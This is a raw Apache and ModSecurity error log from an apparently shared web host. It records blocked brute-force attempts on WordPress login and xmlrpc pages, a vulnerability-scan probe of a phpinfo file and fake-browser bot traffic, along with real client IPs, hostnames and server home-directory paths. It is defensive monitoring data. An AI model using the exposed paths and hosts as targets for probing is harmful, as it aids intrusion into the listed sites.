[Tue May 26 12:56:32.845920 2026] [security2:error] [pid 461618:tid 461841] [client 193.228.128.78:27917] ModSecurity: Access denied with code 406 (phase 2). Match of "rx [.](png|jpeg|jpg|tiff|bmp|gif|webp|heif|svg|raw|ico|ppm|pgm|pbm|exr|nef|dng|cr2|orf|arw|pef|sr2|raf|kdc|indd|ai|eps|pdf|psd|tga|hdr|j2k|jpf|jp2|pspimage|cut|icns|webm|bpg|avif|heic|fpx|hdri|hdp|yuv|sgi|xpm|svgz)$" against "REQUEST_FILENAME" required. [file "/opt/mod_security/hg_rules.conf"] [line "842"] [id "900095"] [msg "Bad UA :: Fake Mozilla Agent"] [hostname "www.jetstarprojects.com"] [uri "/robots.txt"] [unique_id "ahVLKFyiSlSCHr1fdr3DvAAAAOI"]
[Tue May 26 12:56:33.326389 2026] [security2:error] [pid 461618:tid 461669] [remote 141.95.202.18:46026] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 18.202.95.141.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "poonawallatennisacademy.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahVLKVyiSlSCHr1fdr3DxAAAkzI"]
[Tue May 26 12:56:33.504438 2026] [security2:error] [pid 461618:tid 461789] [client 193.228.128.79:60907] ModSecurity: Access denied with code 406 (phase 2). Match of "rx [.](png|jpeg|jpg|tiff|bmp|gif|webp|heif|svg|raw|ico|ppm|pgm|pbm|exr|nef|dng|cr2|orf|arw|pef|sr2|raf|kdc|indd|ai|eps|pdf|psd|tga|hdr|j2k|jpf|jp2|pspimage|cut|icns|webm|bpg|avif|heic|fpx|hdri|hdp|yuv|sgi|xpm|svgz)$" against "REQUEST_FILENAME" required. [file "/opt/mod_security/hg_rules.conf"] [line "842"] [id "900095"] [msg "Bad UA :: Fake Mozilla Agent"] [hostname "jetstarprojects.com"] [uri "/robots.txt"] [unique_id "ahVLKVyiSlSCHr1fdr3DywAAAK4"]
[Tue May 26 12:56:34.112678 2026] [security2:error] [pid 461618:tid 461818] [client 193.228.128.80:57177] ModSecurity: Access denied with code 406 (phase 2). Match of "rx [.](png|jpeg|jpg|tiff|bmp|gif|webp|heif|svg|raw|ico|ppm|pgm|pbm|exr|nef|dng|cr2|orf|arw|pef|sr2|raf|kdc|indd|ai|eps|pdf|psd|tga|hdr|j2k|jpf|jp2|pspimage|cut|icns|webm|bpg|avif|heic|fpx|hdri|hdp|yuv|sgi|xpm|svgz)$" against "REQUEST_FILENAME" required. [file "/opt/mod_security/hg_rules.conf"] [line "842"] [id "900095"] [msg "Bad UA :: Fake Mozilla Agent"] [hostname "www.jetstarprojects.com"] [uri "/robots.txt"] [unique_id "ahVLKlyiSlSCHr1fdr3D3AAAAMs"]
[Tue May 26 12:56:34.706180 2026] [security2:error] [pid 461618:tid 461821] [client 85.159.229.129:60871] ModSecurity: Access denied with code 406 (phase 2). Match of "rx [.](png|jpeg|jpg|tiff|bmp|gif|webp|heif|svg|raw|ico|ppm|pgm|pbm|exr|nef|dng|cr2|orf|arw|pef|sr2|raf|kdc|indd|ai|eps|pdf|psd|tga|hdr|j2k|jpf|jp2|pspimage|cut|icns|webm|bpg|avif|heic|fpx|hdri|hdp|yuv|sgi|xpm|svgz)$" against "REQUEST_FILENAME" required. [file "/opt/mod_security/hg_rules.conf"] [line "842"] [id "900095"] [msg "Bad UA :: Fake Mozilla Agent"] [hostname "jetstarprojects.com"] [uri "/news-sitemap.xml"] [unique_id "ahVLKlyiSlSCHr1fdr3D9wAAAM4"]
[Tue May 26 12:56:34.707291 2026] [security2:error] [pid 461618:tid 461767] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLKlyiSlSCHr1fdr3D5wAAAJg"]
[Tue May 26 12:56:34.710478 2026] [security2:error] [pid 461618:tid 461761] [client 85.159.229.128:58713] ModSecurity: Access denied with code 406 (phase 2). Match of "rx [.](png|jpeg|jpg|tiff|bmp|gif|webp|heif|svg|raw|ico|ppm|pgm|pbm|exr|nef|dng|cr2|orf|arw|pef|sr2|raf|kdc|indd|ai|eps|pdf|psd|tga|hdr|j2k|jpf|jp2|pspimage|cut|icns|webm|bpg|avif|heic|fpx|hdri|hdp|yuv|sgi|xpm|svgz)$" against "REQUEST_FILENAME" required. [file "/opt/mod_security/hg_rules.conf"] [line "842"] [id "900095"] [msg "Bad UA :: Fake Mozilla Agent"] [hostname "jetstarprojects.com"] [uri "/wp-sitemap.xml"] [unique_id "ahVLKlyiSlSCHr1fdr3D-AAAAJI"]
[Tue May 26 12:56:34.713285 2026] [security2:error] [pid 461618:tid 461848] [client 85.159.229.124:46401] ModSecurity: Access denied with code 406 (phase 2). Match of "rx [.](png|jpeg|jpg|tiff|bmp|gif|webp|heif|svg|raw|ico|ppm|pgm|pbm|exr|nef|dng|cr2|orf|arw|pef|sr2|raf|kdc|indd|ai|eps|pdf|psd|tga|hdr|j2k|jpf|jp2|pspimage|cut|icns|webm|bpg|avif|heic|fpx|hdri|hdp|yuv|sgi|xpm|svgz)$" against "REQUEST_FILENAME" required. [file "/opt/mod_security/hg_rules.conf"] [line "842"] [id "900095"] [msg "Bad UA :: Fake Mozilla Agent"] [hostname "jetstarprojects.com"] [uri "/sitemap.xml"] [unique_id "ahVLKlyiSlSCHr1fdr3D-QAAAOk"]
[Tue May 26 12:56:34.713833 2026] [security2:error] [pid 461618:tid 461757] [client 85.159.229.127:40647] ModSecurity: Access denied with code 406 (phase 2). Match of "rx [.](png|jpeg|jpg|tiff|bmp|gif|webp|heif|svg|raw|ico|ppm|pgm|pbm|exr|nef|dng|cr2|orf|arw|pef|sr2|raf|kdc|indd|ai|eps|pdf|psd|tga|hdr|j2k|jpf|jp2|pspimage|cut|icns|webm|bpg|avif|heic|fpx|hdri|hdp|yuv|sgi|xpm|svgz)$" against "REQUEST_FILENAME" required. [file "/opt/mod_security/hg_rules.conf"] [line "842"] [id "900095"] [msg "Bad UA :: Fake Mozilla Agent"] [hostname "jetstarprojects.com"] [uri "/sitemap_index.xml"] [unique_id "ahVLKlyiSlSCHr1fdr3D-gAAAI4"]
[Tue May 26 12:56:34.714759 2026] [security2:error] [pid 461618:tid 461838] [client 85.159.229.125:42925] ModSecurity: Access denied with code 406 (phase 2). Match of "rx [.](png|jpeg|jpg|tiff|bmp|gif|webp|heif|svg|raw|ico|ppm|pgm|pbm|exr|nef|dng|cr2|orf|arw|pef|sr2|raf|kdc|indd|ai|eps|pdf|psd|tga|hdr|j2k|jpf|jp2|pspimage|cut|icns|webm|bpg|avif|heic|fpx|hdri|hdp|yuv|sgi|xpm|svgz)$" against "REQUEST_FILENAME" required. [file "/opt/mod_security/hg_rules.conf"] [line "842"] [id "900095"] [msg "Bad UA :: Fake Mozilla Agent"] [hostname "jetstarprojects.com"] [uri "/sitemap.xml.gz"] [unique_id "ahVLKlyiSlSCHr1fdr3D-wAAAN8"]
[Tue May 26 12:56:34.766501 2026] [security2:error] [pid 461618:tid 461831] [client 138.124.62.18:40549] ModSecurity: Access denied with code 406 (phase 2). Match of "rx [.](png|jpeg|jpg|tiff|bmp|gif|webp|heif|svg|raw|ico|ppm|pgm|pbm|exr|nef|dng|cr2|orf|arw|pef|sr2|raf|kdc|indd|ai|eps|pdf|psd|tga|hdr|j2k|jpf|jp2|pspimage|cut|icns|webm|bpg|avif|heic|fpx|hdri|hdp|yuv|sgi|xpm|svgz)$" against "REQUEST_FILENAME" required. [file "/opt/mod_security/hg_rules.conf"] [line "842"] [id "900095"] [msg "Bad UA :: Fake Mozilla Agent"] [hostname "www.jetstarprojects.com"] [uri "/wp-sitemap.xml"] [unique_id "ahVLKlyiSlSCHr1fdr3D_AAAANg"]
[Tue May 26 12:56:34.774475 2026] [security2:error] [pid 461618:tid 461792] [client 138.124.62.15:33515] ModSecurity: Access denied with code 406 (phase 2). Match of "rx [.](png|jpeg|jpg|tiff|bmp|gif|webp|heif|svg|raw|ico|ppm|pgm|pbm|exr|nef|dng|cr2|orf|arw|pef|sr2|raf|kdc|indd|ai|eps|pdf|psd|tga|hdr|j2k|jpf|jp2|pspimage|cut|icns|webm|bpg|avif|heic|fpx|hdri|hdp|yuv|sgi|xpm|svgz)$" against "REQUEST_FILENAME" required. [file "/opt/mod_security/hg_rules.conf"] [line "842"] [id "900095"] [msg "Bad UA :: Fake Mozilla Agent"] [hostname "www.jetstarprojects.com"] [uri "/sitemap.xml"] [unique_id "ahVLKlyiSlSCHr1fdr3D_QAAALE"]
[Tue May 26 12:56:34.776034 2026] [security2:error] [pid 461618:tid 461762] [client 138.124.62.19:47009] ModSecurity: Access denied with code 406 (phase 2). Match of "rx [.](png|jpeg|jpg|tiff|bmp|gif|webp|heif|svg|raw|ico|ppm|pgm|pbm|exr|nef|dng|cr2|orf|arw|pef|sr2|raf|kdc|indd|ai|eps|pdf|psd|tga|hdr|j2k|jpf|jp2|pspimage|cut|icns|webm|bpg|avif|heic|fpx|hdri|hdp|yuv|sgi|xpm|svgz)$" against "REQUEST_FILENAME" required. [file "/opt/mod_security/hg_rules.conf"] [line "842"] [id "900095"] [msg "Bad UA :: Fake Mozilla Agent"] [hostname "www.jetstarprojects.com"] [uri "/news-sitemap.xml"] [unique_id "ahVLKlyiSlSCHr1fdr3D_gAAAJM"]
[Tue May 26 12:56:34.781597 2026] [security2:error] [pid 461618:tid 461751] [client 138.124.62.17:43945] ModSecurity: Access denied with code 406 (phase 2). Match of "rx [.](png|jpeg|jpg|tiff|bmp|gif|webp|heif|svg|raw|ico|ppm|pgm|pbm|exr|nef|dng|cr2|orf|arw|pef|sr2|raf|kdc|indd|ai|eps|pdf|psd|tga|hdr|j2k|jpf|jp2|pspimage|cut|icns|webm|bpg|avif|heic|fpx|hdri|hdp|yuv|sgi|xpm|svgz)$" against "REQUEST_FILENAME" required. [file "/opt/mod_security/hg_rules.conf"] [line "842"] [id "900095"] [msg "Bad UA :: Fake Mozilla Agent"] [hostname "www.jetstarprojects.com"] [uri "/sitemap_index.xml"] [unique_id "ahVLKlyiSlSCHr1fdr3D_wAAAIg"]
[Tue May 26 12:56:34.785647 2026] [security2:error] [pid 461618:tid 461804] [client 138.124.62.16:39725] ModSecurity: Access denied with code 406 (phase 2). Match of "rx [.](png|jpeg|jpg|tiff|bmp|gif|webp|heif|svg|raw|ico|ppm|pgm|pbm|exr|nef|dng|cr2|orf|arw|pef|sr2|raf|kdc|indd|ai|eps|pdf|psd|tga|hdr|j2k|jpf|jp2|pspimage|cut|icns|webm|bpg|avif|heic|fpx|hdri|hdp|yuv|sgi|xpm|svgz)$" against "REQUEST_FILENAME" required. [file "/opt/mod_security/hg_rules.conf"] [line "842"] [id "900095"] [msg "Bad UA :: Fake Mozilla Agent"] [hostname "www.jetstarprojects.com"] [uri "/sitemap.xml.gz"] [unique_id "ahVLKlyiSlSCHr1fdr3EAAAAAL0"]
[Tue May 26 12:56:34.966004 2026] [security2:error] [pid 461618:tid 461869] [client 213.165.63.149:33261] ModSecurity: Access denied with code 406 (phase 2). Match of "rx [.](png|jpeg|jpg|tiff|bmp|gif|webp|heif|svg|raw|ico|ppm|pgm|pbm|exr|nef|dng|cr2|orf|arw|pef|sr2|raf|kdc|indd|ai|eps|pdf|psd|tga|hdr|j2k|jpf|jp2|pspimage|cut|icns|webm|bpg|avif|heic|fpx|hdri|hdp|yuv|sgi|xpm|svgz)$" against "REQUEST_FILENAME" required. [file "/opt/mod_security/hg_rules.conf"] [line "842"] [id "900095"] [msg "Bad UA :: Fake Mozilla Agent"] [hostname "jetstarprojects.com"] [uri "/sitemap.xml.gz"] [unique_id "ahVLKlyiSlSCHr1fdr3EBAAAAP4"]
[Tue May 26 12:56:34.970485 2026] [security2:error] [pid 461618:tid 461858] [client 213.165.63.150:27331] ModSecurity: Access denied with code 406 (phase 2). Match of "rx [.](png|jpeg|jpg|tiff|bmp|gif|webp|heif|svg|raw|ico|ppm|pgm|pbm|exr|nef|dng|cr2|orf|arw|pef|sr2|raf|kdc|indd|ai|eps|pdf|psd|tga|hdr|j2k|jpf|jp2|pspimage|cut|icns|webm|bpg|avif|heic|fpx|hdri|hdp|yuv|sgi|xpm|svgz)$" against "REQUEST_FILENAME" required. [file "/opt/mod_security/hg_rules.conf"] [line "842"] [id "900095"] [msg "Bad UA :: Fake Mozilla Agent"] [hostname "jetstarprojects.com"] [uri "/sitemap_index.xml"] [unique_id "ahVLKlyiSlSCHr1fdr3EBQAAAPM"]
[Tue May 26 12:56:34.982850 2026] [security2:error] [pid 461618:tid 461800] [client 85.159.229.123:52461] ModSecurity: Access denied with code 406 (phase 2). Match of "rx [.](png|jpeg|jpg|tiff|bmp|gif|webp|heif|svg|raw|ico|ppm|pgm|pbm|exr|nef|dng|cr2|orf|arw|pef|sr2|raf|kdc|indd|ai|eps|pdf|psd|tga|hdr|j2k|jpf|jp2|pspimage|cut|icns|webm|bpg|avif|heic|fpx|hdri|hdp|yuv|sgi|xpm|svgz)$" against "REQUEST_FILENAME" required. [file "/opt/mod_security/hg_rules.conf"] [line "842"] [id "900095"] [msg "Bad UA :: Fake Mozilla Agent"] [hostname "www.jetstarprojects.com"] [uri "/news-sitemap.xml"] [unique_id "ahVLKlyiSlSCHr1fdr3EBgAAALk"]
[Tue May 26 12:56:35.025351 2026] [security2:error] [pid 461618:tid 461826] [client 46.29.238.230:25677] ModSecurity: Access denied with code 406 (phase 2). Match of "rx [.](png|jpeg|jpg|tiff|bmp|gif|webp|heif|svg|raw|ico|ppm|pgm|pbm|exr|nef|dng|cr2|orf|arw|pef|sr2|raf|kdc|indd|ai|eps|pdf|psd|tga|hdr|j2k|jpf|jp2|pspimage|cut|icns|webm|bpg|avif|heic|fpx|hdri|hdp|yuv|sgi|xpm|svgz)$" against "REQUEST_FILENAME" required. [file "/opt/mod_security/hg_rules.conf"] [line "842"] [id "900095"] [msg "Bad UA :: Fake Mozilla Agent"] [hostname "www.jetstarprojects.com"] [uri "/sitemap_index.xml"] [unique_id "ahVLK1yiSlSCHr1fdr3EBwAAANM"]
[Tue May 26 12:56:35.033341 2026] [security2:error] [pid 461618:tid 461797] [client 46.29.238.228:63871] ModSecurity: Access denied with code 406 (phase 2). Match of "rx [.](png|jpeg|jpg|tiff|bmp|gif|webp|heif|svg|raw|ico|ppm|pgm|pbm|exr|nef|dng|cr2|orf|arw|pef|sr2|raf|kdc|indd|ai|eps|pdf|psd|tga|hdr|j2k|jpf|jp2|pspimage|cut|icns|webm|bpg|avif|heic|fpx|hdri|hdp|yuv|sgi|xpm|svgz)$" against "REQUEST_FILENAME" required. [file "/opt/mod_security/hg_rules.conf"] [line "842"] [id "900095"] [msg "Bad UA :: Fake Mozilla Agent"] [hostname "www.jetstarprojects.com"] [uri "/sitemap.xml"] [unique_id "ahVLK1yiSlSCHr1fdr3ECAAAALY"]
[Tue May 26 12:56:35.132824 2026] [security2:error] [pid 461618:tid 461783] [client 213.165.63.148:51919] ModSecurity: Access denied with code 406 (phase 2). Match of "rx [.](png|jpeg|jpg|tiff|bmp|gif|webp|heif|svg|raw|ico|ppm|pgm|pbm|exr|nef|dng|cr2|orf|arw|pef|sr2|raf|kdc|indd|ai|eps|pdf|psd|tga|hdr|j2k|jpf|jp2|pspimage|cut|icns|webm|bpg|avif|heic|fpx|hdri|hdp|yuv|sgi|xpm|svgz)$" against "REQUEST_FILENAME" required. [file "/opt/mod_security/hg_rules.conf"] [line "842"] [id "900095"] [msg "Bad UA :: Fake Mozilla Agent"] [hostname "jetstarprojects.com"] [uri "/sitemap.xml"] [unique_id "ahVLK1yiSlSCHr1fdr3EEQAAAKg"]
[Tue May 26 12:56:35.193185 2026] [security2:error] [pid 461618:tid 461781] [client 46.29.238.231:60149] ModSecurity: Access denied with code 406 (phase 2). Match of "rx [.](png|jpeg|jpg|tiff|bmp|gif|webp|heif|svg|raw|ico|ppm|pgm|pbm|exr|nef|dng|cr2|orf|arw|pef|sr2|raf|kdc|indd|ai|eps|pdf|psd|tga|hdr|j2k|jpf|jp2|pspimage|cut|icns|webm|bpg|avif|heic|fpx|hdri|hdp|yuv|sgi|xpm|svgz)$" against "REQUEST_FILENAME" required. [file "/opt/mod_security/hg_rules.conf"] [line "842"] [id "900095"] [msg "Bad UA :: Fake Mozilla Agent"] [hostname "www.jetstarprojects.com"] [uri "/wp-sitemap.xml"] [unique_id "ahVLK1yiSlSCHr1fdr3EEwAAAKY"]
[Tue May 26 12:56:35.200968 2026] [security2:error] [pid 461618:tid 461820] [client 213.165.63.152:15277] ModSecurity: Access denied with code 406 (phase 2). Match of "rx [.](png|jpeg|jpg|tiff|bmp|gif|webp|heif|svg|raw|ico|ppm|pgm|pbm|exr|nef|dng|cr2|orf|arw|pef|sr2|raf|kdc|indd|ai|eps|pdf|psd|tga|hdr|j2k|jpf|jp2|pspimage|cut|icns|webm|bpg|avif|heic|fpx|hdri|hdp|yuv|sgi|xpm|svgz)$" against "REQUEST_FILENAME" required. [file "/opt/mod_security/hg_rules.conf"] [line "842"] [id "900095"] [msg "Bad UA :: Fake Mozilla Agent"] [hostname "jetstarprojects.com"] [uri "/news-sitemap.xml"] [unique_id "ahVLK1yiSlSCHr1fdr3EFAAAAM0"]
[Tue May 26 12:56:35.827879 2026] [security2:error] [pid 461618:tid 461865] [client 74.7.244.12:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "houstontxmobilecovidlab.taotechservices.com"] [uri "/index.php"] [unique_id "ahVLK1yiSlSCHr1fdr3EGgAAAPo"]
[Tue May 26 12:56:35.884186 2026] [security2:error] [pid 461618:tid 461824] [client 74.7.244.12:48640] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "houstontxmobilecovidlab.taotechservices.com"] [uri "/robots.txt"] [unique_id "ahVLK1yiSlSCHr1fdr3EGAAA0Wg"]
[Tue May 26 12:56:37.921160 2026] [security2:error] [pid 461618:tid 461825] [client 195.178.110.34:60830] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 34.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.canopykaapi.com"] [uri "/_phpinfo.php"] [unique_id "ahVLLVyiSlSCHr1fdr3EYgAAANI"]
[Tue May 26 12:56:37.988163 2026] [security2:error] [pid 461618:tid 461760] [client 94.26.106.90:51510] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 90.106.26.94.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cing.com.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahVLLVyiSlSCHr1fdr3EXgAAAJE"], referer: https://www.bing.com/
[Tue May 26 12:56:38.033651 2026] [security2:error] [pid 461618:tid 461758] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLLVyiSlSCHr1fdr3EWgAAAI8"]
[Tue May 26 12:56:38.231016 2026] [security2:error] [pid 461618:tid 461791] [client 46.29.238.229:11487] ModSecurity: Access denied with code 406 (phase 2). Match of "rx [.](png|jpeg|jpg|tiff|bmp|gif|webp|heif|svg|raw|ico|ppm|pgm|pbm|exr|nef|dng|cr2|orf|arw|pef|sr2|raf|kdc|indd|ai|eps|pdf|psd|tga|hdr|j2k|jpf|jp2|pspimage|cut|icns|webm|bpg|avif|heic|fpx|hdri|hdp|yuv|sgi|xpm|svgz)$" against "REQUEST_FILENAME" required. [file "/opt/mod_security/hg_rules.conf"] [line "842"] [id "900095"] [msg "Bad UA :: Fake Mozilla Agent"] [hostname "www.jetstarprojects.com"] [uri "/sitemap.xml.gz"] [unique_id "ahVLLlyiSlSCHr1fdr3EbwAAALA"]
[Tue May 26 12:56:38.318640 2026] [security2:error] [pid 461618:tid 461767] [client 94.26.106.90:62745] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 90.106.26.94.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cing.com.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahVLLlyiSlSCHr1fdr3EcAAAAJg"]
[Tue May 26 12:56:40.146234 2026] [security2:error] [pid 461618:tid 461766] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLL1yiSlSCHr1fdr3EmAAAAJc"]
[Tue May 26 12:56:40.681619 2026] [security2:error] [pid 461618:tid 461730] [remote 103.95.119.103:47032] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.119.95.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "friendsalongtheway.net"] [uri "/wp-login.php"] [unique_id "ahVLMFyiSlSCHr1fdr3ErgAAoW8"]
[Tue May 26 12:56:40.890542 2026] [security2:error] [pid 461618:tid 461771] [client 157.20.138.61:64768] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVLMFyiSlSCHr1fdr3EsgAAAJw"]
[Tue May 26 12:56:40.890715 2026] [security2:error] [pid 461618:tid 461771] [client 157.20.138.61:64768] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVLMFyiSlSCHr1fdr3EsgAAAJw"]
[Tue May 26 12:56:41.287422 2026] [security2:error] [pid 461618:tid 461813] [client 213.165.63.151:10439] ModSecurity: Access denied with code 406 (phase 2). Match of "rx [.](png|jpeg|jpg|tiff|bmp|gif|webp|heif|svg|raw|ico|ppm|pgm|pbm|exr|nef|dng|cr2|orf|arw|pef|sr2|raf|kdc|indd|ai|eps|pdf|psd|tga|hdr|j2k|jpf|jp2|pspimage|cut|icns|webm|bpg|avif|heic|fpx|hdri|hdp|yuv|sgi|xpm|svgz)$" against "REQUEST_FILENAME" required. [file "/opt/mod_security/hg_rules.conf"] [line "842"] [id "900095"] [msg "Bad UA :: Fake Mozilla Agent"] [hostname "jetstarprojects.com"] [uri "/wp-sitemap.xml"] [unique_id "ahVLMVyiSlSCHr1fdr3EwgAAAMY"]
[Tue May 26 12:56:41.479279 2026] [autoindex:error] [pid 461618:tid 461775] [client 43.250.164.247:0] AH01276: Cannot serve directory /home2/ucdccoin/public_html/upload/slider/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://www.ucdc.co.in/home/inquiry
[Tue May 26 12:56:41.520410 2026] [security2:error] [pid 461618:tid 461805] [client 43.250.164.247:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahVLMVyiSlSCHr1fdr3EzAAAAL4"], referer: https://www.ucdc.co.in/
[Tue May 26 12:56:42.383249 2026] [security2:error] [pid 461618:tid 461755] [client 43.172.196.154:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVLMlyiSlSCHr1fdr3E6QAAAIw"]
[Tue May 26 12:56:42.510284 2026] [security2:error] [pid 461618:tid 461806] [client 43.173.182.160:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVLMlyiSlSCHr1fdr3E-wAAAL8"]
[Tue May 26 12:56:42.725847 2026] [core:crit] [pid 461618:tid 461812] (13)Permission denied: [client 66.249.70.136:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 12:56:42.863586 2026] [security2:error] [pid 461618:tid 461815] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLMlyiSlSCHr1fdr3E8QAAAMg"]
[Tue May 26 12:56:42.864459 2026] [core:crit] [pid 461618:tid 461768] (13)Permission denied: [client 66.249.70.136:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 12:56:44.261333 2026] [autoindex:error] [pid 461618:tid 461863] [client 43.250.164.247:0] AH01276: Cannot serve directory /home2/ucdccoin/public_html/upload/slider/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://www.ucdc.co.in/home/inquiry
[Tue May 26 12:56:44.302130 2026] [security2:error] [pid 461618:tid 461874] [client 43.250.164.247:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahVLNFyiSlSCHr1fdr3FMAAAAQM"], referer: https://www.ucdc.co.in/
[Tue May 26 12:56:45.476797 2026] [security2:error] [pid 461618:tid 461852] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLNVyiSlSCHr1fdr3FQgAAAO0"]
[Tue May 26 12:56:47.226318 2026] [ssl:error] [pid 461618:tid 461818] [client 98.84.1.175:18276] AH02032: Hostname md-74.webhostbox.net (default host as no SNI was provided) and hostname webmail.subbroker.bloggertarget.com provided via HTTP have no compatible SSL setup for policy 'secure'
[Tue May 26 12:56:48.287441 2026] [security2:error] [pid 461618:tid 461812] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLN1yiSlSCHr1fdr3FZgAAAMU"]
[Tue May 26 12:56:51.412653 2026] [security2:error] [pid 461618:tid 461770] [client 157.20.138.61:65135] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVLO1yiSlSCHr1fdr3FmQAAAJs"]
[Tue May 26 12:56:51.412843 2026] [security2:error] [pid 461618:tid 461770] [client 157.20.138.61:65135] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVLO1yiSlSCHr1fdr3FmQAAAJs"]
